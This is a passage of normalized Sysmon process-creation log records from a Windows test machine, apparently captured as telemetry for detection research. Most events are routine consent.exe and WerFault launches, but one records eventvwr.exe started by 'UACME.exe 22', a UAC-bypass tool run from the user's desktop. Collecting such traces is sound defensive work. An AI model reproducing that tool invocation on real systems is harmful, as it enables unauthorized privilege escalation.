"PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 4740 -s 128", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001085ee0601", "object.process.hash.imphash": "3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "6388", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.578Z", "type": "raw", "uuid": "5c42d076-4c0d-491a-9196-39f2693106e3" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7537753Z\"},\"EventRecordID\":\"5444\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 318 0000028064471300", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "4740", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.399Z", "type": "raw", "uuid": "2a8d15ba-ff8a-4709-b122-f4121ea80dd1" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7215806Z\"},\"EventRecordID\":\"5443\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.350\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001027dc0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4604\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001027dc0601", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4604", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.350Z", "type": "raw", "uuid": "46a33b2f-ec5a-47cd-b6c0-98543e66a016" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:15.6646074Z\"},\"EventRecordID\":\"5442\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:15.660\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792f-5d45-0000-00103da80601}\"},{\"Name\":\"ProcessId\",\"text\":\"2388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC170\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC170", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792f-5d45-0000-00103da80601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "2388", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:15.660Z", "type": "raw", "uuid": "4e1d5f0f-b3c3-429c-9ef4-1346dd1497c0" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.9773218Z\"},\"EventRecordID\":\"5441\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.972\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-00104a760601}\"},{\"Name\":\"ProcessId\",\"text\":\"8072\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC890\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC890", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-00104a760601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "8072", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.972Z", "type": "raw", "uuid": "e547ebd6-7c5c-43f5-976a-3338e6f9d1e8" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.3727351Z\"},\"EventRecordID\":\"5440\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.368\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-001001560601}\"},{\"Name\":\"ProcessId\",\"text\":\"6716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC9C0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC9C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-001001560601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "6716", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.368Z", "type": "raw", "uuid": "15801084-49e4-410f-8731-2d4fc0090ea9" } -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8748883Z\"},\"EventRecordID\":\"5439\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.760\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00107a250601}\"},{\"Name\":\"ProcessId\",\"text\":\"7472\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC3D0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 